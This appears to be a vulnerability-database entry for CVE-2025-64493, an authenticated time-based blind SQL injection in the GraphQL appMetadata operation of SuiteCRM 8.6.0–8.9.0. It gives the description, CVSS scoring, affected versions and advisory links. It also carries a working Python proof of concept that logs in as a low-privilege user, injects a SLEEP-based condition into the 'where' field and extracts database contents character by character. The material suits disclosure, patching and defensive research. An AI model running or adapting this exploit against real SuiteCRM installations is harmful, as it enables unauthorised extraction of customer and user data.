Security Vulnerability Report
CVE-2025-64493 CVSS 6.5 MEDIUM

CVE-2025-64493

Published: 2025-11-08 02:15:35
Last Modified: 2025-11-25 17:33:59

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 8.6.0 through 8.9.0 there is an authenticated, blind (time-based) SQL injection inside the appMetadata operation of the GraphQL API. It allows extraction of arbitrary data from the database and does not require administrative access. This issue is fixed in version 8.9.1.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Vector breakdown: network attack vector, low attack complexity, low privileges required (an ordinary authenticated user), no user interaction, unchanged scope; high confidentiality impact, no integrity or availability impact (exploitability 2.8, impact 3.6).
Weakness: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, i.e. SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM 8.6.0
SuiteCRM 8.6.1
SuiteCRM 8.7.0
SuiteCRM 8.8.0
SuiteCRM 8.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-64493 PoC - SuiteCRM GraphQL API Time-Based Blind SQL Injection
Note: This is a simplified demonstration for security research purposes.
Modify and use responsibly with proper authorization.
"""
import requests
import json
import time

TARGET_URL = "http://target-suitecrm.com/api/graphql"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"


def get_auth_token():
    """Obtain authentication token via login mutation"""
    login_mutation = {
        "query": """
        mutation Login($username: String!, $password: String!) {
            login(username: $username, password: $password) {
                id
                sessionToken
            }
        }
        """,
        "variables": {
            "username": USERNAME,
            "password": PASSWORD
        }
    }
    response = requests.post(TARGET_URL, json=login_mutation)
    data = response.json()
    return data['data']['login']['sessionToken']


def extract_data(token, sql_payload):
    """
    Execute blind SQL injection via appMetadata operation
    sql_payload: Time-based injection payload
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    injection_query = {
        "query": f"""
        query {{
            appMetadata(
                input: {{
                    module: "Users"
                    where: "id = '1' AND (SELECT CASE WHEN {sql_payload} THEN SLEEP(5) ELSE 0 END)"
                }}
            ) {{
                id
                userName
            }}
        }}
        """
    }
    start_time = time.time()
    response = requests.post(TARGET_URL, json=injection_query, headers=headers)
    elapsed = time.time() - start_time
    return elapsed > 4  # If delay occurred, condition was true


def extract_char(token, query, position, char):
    """Extract a single character using time-based injection"""
    sql_payload = f"(SELECT SUBSTRING(({query}), {position}, 1) = '{char}')"
    return extract_data(token, sql_payload)


def main():
    print("[*] Obtaining authentication token...")
    token = get_auth_token()
    print("[+] Token obtained successfully")

    # Example: Extract database version
    print("[*] Extracting database version...")
    db_version = ""
    charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-"
    for pos in range(1, 50):
        found = False
        for char in charset:
            if extract_char(token, "@@version", pos, char):
                db_version += char
                found = True
                break
        if not found:
            break
        print(f"[*] Current version: {db_version}")
    print(f"[+] Extracted database version: {db_version}")


if __name__ == "__main__":
    main()
```

References

From the NVD record for this CVE (affected range: versions from 8.6.0 inclusive up to but excluding 8.9.1):

https://docs.suitecrm.com/community/security-policy (Product)
https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-5gcj-mfqq-v8f7 (Vendor Advisory)
